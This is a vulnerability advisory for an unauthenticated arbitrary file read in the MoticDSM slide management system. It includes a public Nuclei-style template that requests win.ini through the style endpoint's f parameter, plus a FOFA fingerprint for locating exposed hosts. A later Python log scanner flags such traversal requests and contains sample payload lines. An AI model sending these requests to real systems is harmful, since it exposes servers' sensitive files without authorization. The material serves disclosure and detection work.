motic-dsm-arbitrary-file-read: MoticDSM - Arbitrary File Read

Date: 2025-08-01 | Affected software: MoticDSM | PoC: public

Vulnerability description

The `style` endpoint of the Motic Digital Slide Management System (MoticDSM) has an arbitrary file read vulnerability: the `f` parameter is used as a file path without restriction. Unauthenticated attackers can exploit this to read sensitive system files, leaving the site in a highly insecure state.

PoC code [public]

id: motic-dsm-arbitrary-file-read

info:
  name: MoticDSM - Arbitrary File Read
  author: s4e-io
  severity: high
  description: |
    Motic Digital Slide Management System style has an arbitrary file reading vulnerability. Unauthenticated attackers can exploit this vulnerability to read important system files, leaving the website in a highly insecure state.
  reference:
    - https://blog.csdn.net/qq_41904294/article/details/141219553
    - https://blog.csdn.net/weixin_44337800/article/details/141328430
  metadata:
    verified: true
    max-request: 2
    vendor: xiamen-motic
    product: moticdsm
    fofa-query: icon_hash="617142232"
  tags: moticdsm,lfi,file-read,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /UploadService/Page/ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"Motic")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        GET /UploadService/Page/style?f=c:\windows\win.ini HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"bit app support","fonts","extensions")'
          - 'contains(content_type,"text/css")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100e0461ba0a3ebef7a3f72ad9e629ebf741c86f644e00250a02115f51fc088b3c0022045ed4649ee01f406bbe38022e1523a89597a74b38f320eb0f052b937aae4be7c:922c64590222798bb761d5b6d8e72950
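A defender-side check for the request pattern the template above probes, added here as an example that is neither the advisory's nor Motic's code. It scans constructed web-server log lines for `style?f=` requests whose `f` value escapes a stylesheet directory (absolute or drive-letter paths, UNC paths, `..` traversal), and the same predicate is what a hardened handler should apply before opening the file. The log line layout and the `/UploadService/Page/style` path matching are assumptions.

```python
import ntpath
import re
from urllib.parse import parse_qs, unquote

# Request path from the advisory, compared case-insensitively (IIS is case-insensitive).
STYLE_PATH = "/uploadservice/page/style"

def is_unsafe_style_param(f: str) -> bool:
    """True if `f` cannot be a plain stylesheet name: it carries a drive letter or
    UNC prefix, starts at the filesystem root, or contains a '..' path component
    (both Windows and POSIX separators are considered)."""
    f = unquote(f)
    drive, _ = ntpath.splitdrive(f)          # 'c:' or '\\\\server\\share', '' otherwise
    if drive or f.startswith(("\\", "/")):
        return True
    parts = re.split(r"[\\/]+", f)
    return ".." in parts

def flag_style_read(log_line: str):
    """Parse one constructed log line 'client method path query status' (assumed
    layout, not a real IIS format) and return (client, decoded f) when the request
    targets the style endpoint with an unsafe `f` value, else None."""
    fields = log_line.split()
    if len(fields) < 4:
        return None
    client, _method, path, query = fields[:4]
    if path.lower() != STYLE_PATH:
        return None
    for f in parse_qs(query).get("f", []):   # parse_qs already URL-decodes values
        if is_unsafe_style_param(f):
            return (client, unquote(f))
    return None

def scan(lines):
    """Return every (client, f) hit found in the given log lines, in order."""
    return [hit for hit in map(flag_style_read, lines) if hit]

# Constructed sample log lines for the demonstration (not real traffic).
SAMPLE_LOG = [
    "203.0.113.5 GET /UploadService/Page/style f=site.css 200",
    "203.0.113.5 GET /UploadService/Page/style f=c:\\windows\\win.ini 200",
    "198.51.100.7 GET /UploadService/Page/style f=..%2F..%2Fweb.config 200",
    "198.51.100.7 GET /UploadService/Page/ - 200",
]

if __name__ == "__main__":
    for client, f in scan(SAMPLE_LOG):
        print(f"file-read attempt from {client}: f={f}")
```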
